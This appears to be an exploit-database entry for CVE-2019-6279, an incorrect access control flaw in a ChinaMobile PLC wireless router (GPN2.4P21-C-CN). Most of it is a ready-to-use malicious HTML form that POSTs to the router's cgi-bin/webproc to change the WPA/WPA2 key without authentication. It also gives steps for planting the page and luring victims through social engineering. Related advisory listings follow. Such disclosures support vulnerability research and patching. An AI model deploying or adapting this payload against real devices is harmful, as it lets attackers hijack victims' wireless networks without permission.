Lucene search
Kumar Saurav1337DAY-ID-32041HistoryJan 23, 2019 - 12:00 a.m.
PLC Wireless Router GPN2.4P21-C-CN Incorrect Access Control Vulnerability
2019-01-2300:00:00
Kumar Saurav
0day.today
70
EPSS
0.032
Percentile
91.4%
Exploit for hardware platform in category web applications
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access Control
# Exploit Author: Kumar Saurav
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Windows
# CVE : CVE-2019-6279
#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware
W2001EN-00 have an Incorrect Access Control vulnerability via the cgi-bin/webproc?getpage=html/index.html
subpage=wlsecurity URI, allowing an Attacker to change the Wireless Security Password.
#Reproduction Steps:
Step 1: Building a malicious html web page
Step 2: Attacker's wants to change the wireless security (WPA/WPA2) key to "PSWDmatlo331#@!" (in my case)
Step 3:
<html>
<body>
<form method="POST" action="http://192.168.59.254:80/cgi-bin/webproc">
<input type="text" name="sessionid" value="2a39a09e">
<input type="text" name="language" value="en_us">
<input type="text" name="sys_UserName" value="admin">
<input type="text" name="var:menu" value="setup">
<input type="text" name="var:page" value="wireless">
<input type="text" name="var:subpage" value="wlsecurity">
<input type="text" name="var:errorpage" value="wlsecurity">
<input type="text" name="getpage" value="html/index.html">
<input type="text" name="errorpage" value="html/index.html">
<input type="text" name="var:arrayid" value="0">
<input type="text" name="obj-action" value="set">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType" value="11i">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes" value="AESEncryption">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode" value="PSKAuthentication">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey" value="100">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase" value="PSWDmatlo331#@!">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression" value="KeyPassphrase">
<input type="submit" value="Send">
</form>
</body>
</html>
Step 4: save this as Incorrect_Access_Control.html
Step 5: Planting this malicious web page (Incorrect_Access_Control.html) that are
likely to be visited by the victim's (by social engineering) or any user connected in the Access Point (AP)
will have to visit this page or any attacker connected in the AP will trigger this exploit
Step 6: After execution of above exploit, wireless security (WPA/WPA2) key will change!!
Note: This vulnerability allowing an attacker to reproduce without login.
# 0day.today [2019-02-06] #Related
prion
prion
Improper access control
2019-03-21 16:01:00
packetstorm
packetstorm
PLC Wireless Router GPN2.4P21-C-CN Incorrect Access Control
2019-03-20 00:00:00
PLC Wireless Router GPN2.4P21-C-CN Incorrect Access Control
2019-01-22 00:00:00
cvelist
cvelist
CVE-2019-6279
2019-03-19 19:57:54
zdt
zdt
PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control Exploit
2019-03-20 00:00:00
nvd
nvd
CVE-2019-6279
2019-03-21 16:01:07
cve
cve
CVE-2019-6279
2019-03-21 16:01:07
exploitpack
exploitpack
PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control
2019-03-20 00:00:00
exploitdb
exploitdb
PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control
2019-03-20 00:00:00